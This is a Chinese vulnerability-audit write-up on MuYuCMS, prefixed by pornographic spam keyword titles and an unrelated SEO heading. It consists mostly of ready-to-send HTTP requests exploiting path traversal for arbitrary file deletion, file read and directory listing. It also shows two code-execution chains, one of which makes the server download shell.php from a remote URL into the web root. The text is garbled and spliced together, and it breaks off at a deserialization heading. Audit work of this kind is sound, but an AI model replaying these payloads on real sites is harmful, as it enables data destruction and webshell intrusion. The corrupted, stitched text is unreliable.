国产玉足榨精视频在线_亚洲日韩国产第一区_男人都懂的网站在线观看免费_久久91亞洲精品中文字幕奶水_按摩房技师激情国产精品_无人在线观看视频在线观看_年轻女教师2免费播放_欧洲熟妇色xxⅩx欧美老妇多毛_91爱视频成人在线第一页_欧美日韩中文字幕成人网

日志樣式

淮安網(wǎng)站建設(shè)一條龍全包(木魚(yú)花 英文)木魚(yú)花是什么做的,

原標(biāo)題:木魚(yú)cms 審計(jì)小結(jié)MuYuCMS基于Thinkphp開(kāi)發(fā)的一套輕量級(jí)開(kāi)源內(nèi)容管理系統(tǒng),專(zhuān)注為公司企業(yè)、個(gè)人站長(zhǎng)提供快速建站提供解決方案。

?環(huán)境搭建 我們利用 phpstudy 來(lái)搭建環(huán)境,選擇 Apache2.4.39 + MySQL5.7.26+ php5.6.9 ,同時(shí)利用 PhpStorm 來(lái)實(shí)現(xiàn)對(duì)項(xiàng)目的調(diào)試

?漏洞復(fù)現(xiàn)分析 ?任意文件刪除 我們?cè)诰W(wǎng)站的根目錄下創(chuàng)建一個(gè)文件 test.txt 用來(lái)校驗(yàn)文件是否被刪除任意文件刪除一 漏洞復(fù)現(xiàn) 登錄后臺(tái)后構(gòu)造數(shù)據(jù)包POST /admin.php/accessory/filesdel.html HTTP/

1.1Host: test.test Content-Length: 55Accept: * /* X-Requested-With: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/admin.php/accessory/filelist.html

Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM

Connection: close filedelur=/upload/files/.gitignore/../../../../test.txt

文件被成功刪除漏洞分析 ppdmincontrollerAccessory::filesdel

通過(guò)參數(shù) $filedelurl 拼接得到要?jiǎng)h除文件的地址,利用 unlink 函數(shù)刪除文件,中間沒(méi)有做任何校驗(yàn)任意文件刪除二 漏洞復(fù)現(xiàn) 登錄后臺(tái)后構(gòu)造數(shù)據(jù)包POST /admin.php/accessory/picdel.html HTTP/

1.1Host: test.test Content-Length: 54Accept: * /* X-Requested-With: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/admin.php/accessory/filelist.html

Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM

Connection: close picdelur=/upload/files/.gitignore/../../../../test.txt

漏洞分析 ppdmincontrollerAccessory::picdel

通過(guò)參數(shù) $picdelur 拼接得到要?jiǎng)h除圖片的地址,利用 unlink 函數(shù)刪除文件,中間沒(méi)有做任何校驗(yàn)任意文件刪除三 漏洞復(fù)現(xiàn) 登錄后臺(tái)后構(gòu)造數(shù)據(jù)包GET /editor/index.php?a=delete_node&type=file&path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/

1.1Host: test.test Cache-Control: max-age= 0Upgrade-Insecure-Requests: 1Origin: http: //test.testUser-Agent: Mozilla/

5.0(Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36(KHTML, like Gecko) Chrome/ 85.0.4183.83Safari/ 537.36

Accept: text/html,application/xhtml+xml,application/xml;q= 0.9,image/avif,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9

Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close

?漏洞分析 AppControllerController::delete_node

AppCoreFile::deleteFile AppControllerController::beforeFun

對(duì)傳入的 path 判斷了是否在合法的文件域中,但沒(méi)有對(duì)傳入的 path 沒(méi)有進(jìn)行跨目錄的校驗(yàn)就刪除了文件?任意文件刪除四 漏洞復(fù)現(xiàn) POST /admin.php/database/sqldel.html HTTP/

1.1Host: test.test Cache-Control: max-age= 0Upgrade-Insecure-Requests: 1Origin: http: //test.testUser-Agent: Mozilla/

5.0(Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36(KHTML, like Gecko) Chrome/ 85.0.4183.83Safari/ 537.36

Accept: text/html,application/xhtml+xml,application/xml;q= 0.9,image/avif,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9

Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close

Content-Type: application/x-www-form-urlencoded Content-Length: 19 name=../../test.txt

漏洞分析 ppdmincontrollerDatabase::sqldel

獲取 post 傳入的參數(shù) name利用 delFile 函數(shù)刪除文件任意文件刪除五 漏洞復(fù)現(xiàn) 登錄后臺(tái)后構(gòu)造數(shù)據(jù)包POST /admin.php/update/rmdirr.html?dirname=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/

1.1Host: test.test Content-Length: 0Accept: * /* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36

X-Requested-With: Origin: http://test.test Referer: http://test.test/admin.php/system/update.html Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341

Connection: close

漏洞分析 ppdmincontrollerUpdate::rmdirr

傳入的參數(shù) $dirname 經(jīng)過(guò)簡(jiǎn)單的判斷,然后調(diào)用 unlink 函數(shù)去刪除任意文件讀取 任意文件讀取 漏洞復(fù)現(xiàn) 登錄后構(gòu)造數(shù)據(jù)包GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/

1.1Host: test.test Cache-Control: max-age= 0Upgrade-Insecure-Requests: 1Origin: http: //test.testUser-Agent: Mozilla/

5.0(Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36(KHTML, like Gecko) Chrome/ 85.0.4183.83Safari/ 537.36

Accept: text/html,application/xhtml+xml,application/xml;q= 0.9,image/avif,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9

Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close

成功讀取文件信息漏洞分析 AppControllerController::get_file 列目錄 漏洞復(fù)現(xiàn) 登錄后構(gòu)造數(shù)據(jù)包GET /editor/index.php?a=dir_list&dir_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../../../../../../../../ HTTP/

1.1Host: test.test Cache-Control: max-age= 0Upgrade-Insecure-Requests: 1Origin: http: //test.testUser-Agent: Mozilla/

5.0(Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36(KHTML, like Gecko) Chrome/ 85.0.4183.83Safari/ 537.36

Accept: text/html,application/xhtml+xml,application/xml;q= 0.9,image/avif,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9

Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close

成功將根目錄下的信息顯露出來(lái)漏洞分析 AppControllerController::dir_list AppCoreJstree::getDir AppControllerController::beforeFun

對(duì)傳入的 dir_path判斷了是否在合法的文件域中,但沒(méi)有對(duì)傳入的 dir_path沒(méi)有進(jìn)行跨目錄的校驗(yàn)就打印出目錄信息任意代碼執(zhí)行 任意代碼執(zhí)行一 漏洞復(fù)現(xiàn) 登錄后構(gòu)造數(shù)據(jù)包,讀取config 文件內(nèi)容

GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php HTTP/

1.1Host: test.test Cache-Control: max-age= 0Upgrade-Insecure-Requests: 1Origin: http: //test.testUser-Agent: Mozilla/

5.0(Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36(KHTML, like Gecko) Chrome/ 85.0.4183.83Safari/ 537.36

Accept: text/html,application/xhtml+xml,application/xml;q= 0.9,image/avif,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9

Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close

此時(shí)需要獲取的并不是文件內(nèi)容,而是更改之后文件的key復(fù)制文件校驗(yàn)碼 替換到下面數(shù)據(jù)包中GET /editor/index.php?a=save_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php&file_key=5e9c862ce52986e5437652d707c7c82f&file_content= HTTP/

1.1Host: test.test Cache-Control: max-age= 0Upgrade-Insecure-Requests: 1Origin: http: //test.testUser-Agent: Mozilla/

5.0(Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36(KHTML, like Gecko) Chrome/ 85.0.4183.83Safari/ 537.36

Accept: text/html,application/xhtml+xml,application/xml;q= 0.9,image/avif,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9

Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close

訪問(wèn)文件在網(wǎng)站上對(duì)應(yīng)的位置,發(fā)現(xiàn)代碼已經(jīng)被成功執(zhí)行也可以執(zhí)行其他代碼漏洞分析 AppControllerController::save_file save_file 有保存文件的操作,但是需要獲取到文件的校驗(yàn)碼。

所以就可以通過(guò)先查詢(xún)文件的相關(guān)信息,然后再對(duì)文件進(jìn)行修改AppCoreFile::setFileContent 任意代碼執(zhí)行二 漏洞復(fù)現(xiàn) 登錄后構(gòu)造數(shù)據(jù)包POST /admin.php/update/getFile.html?url=http:

//127.0.0.1:8000/shell.php&save_dir=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/ HTTP/1.1

Host: test.test Content-Length: 0Accept: * /* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36

X-Requested-With: Origin: http://test.test Referer: http://test.test/admin.php/system/update.html Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341;XDEBUG_SESSION=PHPSTORM

Connection: close 指定遠(yuǎn)程 url 下載文件,下載的文件保存到指定位置訪問(wèn)指定的文件目錄,發(fā)現(xiàn)代碼被成功執(zhí)行漏洞分析 ppdmincontrollerUpdate::getFile

通過(guò) $url 指定獲取遠(yuǎn)程文件的地址,$save_dir 指定保存文件的路徑,并未對(duì)文件的內(nèi)容和類(lèi)型進(jìn)行校驗(yàn),所以就會(huì)產(chǎn)生代碼執(zhí)行漏洞?phar反序列化 ?漏洞復(fù)現(xiàn)